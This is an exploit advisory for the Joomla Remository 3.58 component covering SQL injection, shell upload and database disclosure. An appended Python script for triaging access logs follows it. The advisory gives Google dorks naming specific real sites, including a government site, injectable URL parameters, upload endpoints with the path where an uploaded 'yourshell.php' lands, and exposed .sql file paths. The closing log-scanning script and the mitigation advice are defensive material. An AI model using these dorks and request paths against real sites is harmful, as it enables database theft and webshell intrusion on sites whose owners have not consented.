####################################################################

# Exploit Title : Joomla Remository Components 3.58 SQL Injection / Database Disclosure / Shell Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 30/01/2019
# Vendor Homepage : remository.com
# Software Download Link : remository.com/downloads/joomla-3.x-software/
# Software Information Link : extensions.joomla.org/extension/remository/
# Software Version : 3.58
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/index.php?option=com_remository''
inurl:''/administrator/components/com_remository/''
intext:Site Designed By Conservation Designs
intext:CCCV Gabriel Valencia site:gob.ec
intext:Web creada por softdream.es
intext:Sponsored by Innovatron - Managed by Spirtech
intext:COST Action IC0902, Powered by Joomla! and designed by SiteGround Joomla Templates
intext:Web design by Mercury Web Solutions
intext:Joomla 2.5 Templates Designed by Joomla Templates Free.
intext:© 2001- 2019 by Bayerischer Sportschützenbund e.V.
# Vulnerability Type :
CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
CWE-200 [ Information Exposure ]
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link : cxsecurity.com/issue/WLB-2019010284
packetstormsecurity.com/files/151433/Joomla-Remository-3.58-Database-Disclosure-Shell-Upload-SQL-Injection.html

####################################################################

# Description about Software :
***************************
“Remository” is open source software for Joomla.

####################################################################

# Impact :
***********
* Attackers can exploit this issue via a browser.
The 'com_remository' component for Joomla! is prone to an arbitrary file upload (shell upload) vulnerability because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
* An attacker might be able to inject and/or alter existing SQL statements, which would influence the database exchange.
* Joomla Remository Components 3.58 is prone to SQL injection because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
* Exploiting this issue could allow an attacker to compromise the application, read, access or modify data, or exploit latent vulnerabilities in the underlying database. If the webserver is misconfigured, read & write access to the filesystem may be possible.

####################################################################

# SQL Injection Exploit :
**********************
/index.php?option=com_remository&Itemid=[SQL Injection]

/index.php?option=c&Itemid=[ID-NUMBER]&func=selectcat&cat=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[ID-NUMBER]&orderby=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=fileinfo&id=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=select&id=[ID-NUMBER]&orderby=[ID-NUMBER]&page=[SQL Injection]

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=download&id=[ID-NUMBER]&chk=[HASH-NUMBERS-HERE]&no_html=[SQL Injection]

####################################################################

# Arbitrary File Upload Exploit :
****************************
/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addfile

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addfile&parent=category

/index.php?option=com_remository&Itemid=[ID-NUMBER]&func=addmanyfiles

/index.php?func=addfile&id=[ID-NUMBER]&Itemid=[ID-NUMBER]&option=com_remository&datum=[DAY]-[MONTH]-[YEAR]

/index.php/shared-file-repository/func-addmanyfiles/

Directory File Path :
******************
Search your file here.

/components/com_remository_files/file_image_[ID-NUMBER]/[RANDOM-NUMBERS]yourshell.php

/components/com_remository_files/......

Note : If the website is not vulnerable, it says:

You have no permitted upload categories - please refer to the webmaster

####################################################################

# Database Disclosure Exploit :
***************************
/administrator/components/com_remository/assignment.sql

/administrator/components/com_remository/blob.sql

/administrator/components/com_remository/containers.sql

/administrator/components/com_remository/file.sql

/administrator/components/com_remository/log.sql

/administrator/components/com_remository/permission.sql

/administrator/components/com_remository/repository.sql

/administrator/components/com_remository/reviews.sql

/administrator/components/com_remository/structure.sql

/administrator/components/com_remository/text.sql

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################
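
Added example, not part of the original advisory or of the Remository project: a log triage script a site owner can run over their own webserver access log to find requests matching the three request patterns listed above (.sql files under the admin component directory, PHP files under the upload directory, non-numeric values in the listed parameters). It assumes the common/combined log format and that the listed parameters are integers; the function names and sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory lists as injection points; treating them all as
# integers is an assumption of this example.
NUMERIC_PARAMS = ("Itemid", "id", "cat", "orderby", "page", "no_html")
UPLOAD_FUNCS = {"addfile", "addmanyfiles"}
SQL_FILE = re.compile(r"^/administrator/components/com_remository/[^/]+\.sql$", re.I)
UPLOADED_PHP = re.compile(r"^/components/com_remository_files/.+\.ph(p\d?|tml)$", re.I)
# Common/combined access log format: client ip, request line, status code.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def classify(line):
    """Return (client_ip, finding) for a request worth reviewing, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    ip, method, target, status = m.groups()
    url = urlsplit(target)
    if SQL_FILE.match(url.path):
        # A 200 means the .sql file was actually served to the client.
        return ip, ("sql-file-served" if status == "200" else "sql-file-probe")
    if UPLOADED_PHP.match(url.path):
        return ip, "php-in-upload-dir"
    query = parse_qs(url.query, keep_blank_values=True)  # also URL-decodes values
    if query.get("option") != ["com_remository"]:
        return None
    for name in NUMERIC_PARAMS:
        if any(re.fullmatch(r"[0-9]*", v) is None for v in query.get(name, [])):
            return ip, "non-numeric-" + name
    if method == "POST" and UPLOAD_FUNCS & set(query.get("func", [])):
        return ip, "upload-request"
    return None

def scan(lines):
    """Classify every line and keep only the findings, in log order."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '203.0.113.7 - - [30/Jan/2019:10:00:01 +0000] "GET /administrator/components/com_remository/file.sql HTTP/1.1" 200 5120',
    '203.0.113.7 - - [30/Jan/2019:10:00:04 +0000] "GET /index.php?option=com_remository&Itemid=41&func=select&id=5%27 HTTP/1.1" 200 812',
    '198.51.100.9 - - [30/Jan/2019:10:01:12 +0000] "GET /index.php?option=com_remository&Itemid=41&func=fileinfo&id=12 HTTP/1.1" 200 2048',
    '192.0.2.44 - - [30/Jan/2019:10:02:30 +0000] "GET /components/com_remository_files/file_image_3/1234x.php HTTP/1.1" 200 17',
]

if __name__ == "__main__":
    for ip, finding in scan(SAMPLE):
        print(ip, finding)
```

Any "sql-file-served" or "php-in-upload-dir" finding means the webserver is serving files it should deny: block *.sql under /administrator/components/com_remository/ and disable script execution under /components/com_remository_files/.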